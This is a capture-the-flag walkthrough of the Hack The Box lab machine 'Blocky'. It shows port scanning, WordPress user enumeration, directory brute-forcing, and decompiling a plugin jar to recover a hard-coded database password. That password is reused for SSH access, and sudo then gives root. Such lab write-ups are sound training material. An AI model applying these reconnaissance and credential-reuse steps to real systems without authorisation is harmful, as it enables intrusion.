# HTB - Blocky ![Blocky](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M3ha5HOTVdvsLEb_VnZ%2F-M3jBayoEb4NqX4arp7Z%2Fimage.png?alt=media\&token=cefe94b4-d74a-4751-9dd0-cc8b3cc0d40a) ## Getting Root: 1. Found a file under **`/plugins`** which contained credentials to **`phpMyAdmin`** 2. Found a user named **`notch`** from the WordPress Scan and was able to ssh to the box using the password found on the file from step 1 3. The user had **`ALL ALL`** on the sudoers file and we were able to get root. ### Tools Used: **`wpscan, dirsearch.py, jar, javap`** ## Nmap ```bash nmap -sC -sV -p- 10.10.10.37 -oA nmap/Blocky.allports Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 00:30 EDT Nmap scan report for 10.10.10.37 Host is up (0.041s latency). Not shown: 65530 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft – Under Construction! 8192/tcp closed sophos 25565/tcp open minecraft Minecraft 1.11.2 (Protocol: 127, Message: A Minecraft Server, Users: 0/20) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.88 seconds ``` ## Enumeration ### WPScan Found a user named: **notch** ```bash wpscan --url http://10.10.10.37 -e _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.11 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://10.10.10.37/ [10.10.10.37] [+] Started: Tue Mar 31 01:42:55 2020 Interesting Finding(s): [i] User(s) Identified: [+] notch | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Notch | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ``` ### Dirsearch.py ```bash # dirsearch.py -u http://10.10.10.37 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -E --plain-text-report Blocky_Dirb.txt 200 51KB http://10.10.10.37:80/ 301 309B http://10.10.10.37:80/wiki 301 315B http://10.10.10.37:80/wp-content 301 312B http://10.10.10.37:80/plugins 301 316B http://10.10.10.37:80/wp-includes 301 315B http://10.10.10.37:80/javascript 301 313B http://10.10.10.37:80/wp-admin 301 315B http://10.10.10.37:80/phpmyadmin 403 299B http://10.10.10.37:80/server-status ``` There were two files under **`http://10.10.10.37/plugins`** and decided to have a look. ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M3jCxCy-iVYSSdh2W1e%2F-M3jE0-ozWcqIV94U7zR%2Fimage.png?alt=media\&token=b78ff215-28b2-4fce-93e3-4881d385ccaf) Downloaded the two files checked for anything interesting: ```bash # The two downlaoded files BlockyCore.jar griefprevention-1.11.2-3.1.1.298.jar # To look at their contents we can use: jar -tf BlockyCore.jar # The result is something like: Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true META-INF/MANIFEST.MF com/myfirstplugin/BlockyCore.class # We can use the javap to disassemble the class files javap -c com/myfirstplugin/BlockyCore.class # That produced the following output Compiled from "BlockyCore.java" public class com.myfirstplugin.BlockyCore { public java.lang.String sqlHost; public java.lang.String sqlUser; public java.lang.String sqlPass; public com.myfirstplugin.BlockyCore(); Code: 0: aload_0 1: invokespecial #12 // Method java/lang/Object."":()V 4: aload_0 5: ldc #14 // String localhost 7: putfield #16 // Field sqlHost:Ljava/lang/String; 10: aload_0 11: ldc #18 // String root 13: putfield #20 // Field sqlUser:Ljava/lang/String; 16: aload_0 17: ldc #22 // String 8YsqfCTnvxAUeduzjNSXe22 19: putfield #24 // Field sqlPass:Ljava/lang/String; 22: return ``` #### Credentials: #### **`root:8YsqfCTnvxAUeduzjNSXe22`** ## Exploitation Using those credentials, we can login to **`phpMyAdmin`** ![](https://3391461163-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M-SeUOaaky_0dmtDTFu%2F-M3jGd1U5LjTeSi7izTI%2F-M3jHh_O5J0R29cTzbJo%2Fimage.png?alt=media\&token=7302db03-45b1-4c07-8c56-31a652117629) However using that password with the user **`notch`** (we found it from the WPScan), we can successfully ssh to the box and get the user flag. ```bash ssh notch@10.10.10.37 notch@10.10.10.37's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Tue Mar 31 01:00:33 2020 from 10.10.14.3 notch@Blocky:~$ id uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) ``` ## Privilege Escalation ```bash notch@Blocky:~$ sudo -l Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL notch@Blocky:~$ notch@Blocky:~$ notch@Blocky:~$ sudo su - root@Blocky:~# root@Blocky:~# id uid=0(root) gid=0(root) groups=0(root) root@Blocky:~# root@Blocky:~# ```